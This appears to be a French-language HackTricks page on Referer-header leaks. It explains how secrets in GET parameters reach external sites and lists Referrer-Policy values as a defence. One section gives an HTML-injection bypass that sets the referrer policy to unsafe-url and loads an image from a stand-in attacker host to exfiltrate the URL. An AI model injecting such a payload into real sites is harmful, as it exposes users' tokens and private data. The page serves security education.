3.7 KiB
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.
En-têtes de référent et politique
Le référent est l'en-tête utilisé par les navigateurs pour indiquer quelle était la page précédemment visitée.
Fuite d'informations sensibles
Si à un moment donné sur une page web, des informations sensibles se trouvent dans les paramètres d'une requête GET, et si la page contient des liens vers des sources externes ou qu'un attaquant est capable de faire/suggérer (ingénierie sociale) à l'utilisateur de visiter une URL contrôlée par l'attaquant. Il pourrait être capable d'exfiltrer les informations sensibles contenues dans la dernière requête GET.
Atténuation
Vous pouvez faire en sorte que le navigateur suive une politique de référent qui pourrait éviter que les informations sensibles soient envoyées à d'autres applications web :
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Contre-mesure
Vous pouvez outrepasser cette règle en utilisant une balise meta HTML (l'attaquant doit exploiter une injection HTML) :
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Défense
Ne jamais placer de données sensibles à l'intérieur des paramètres GET ou des chemins dans l'URL.
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.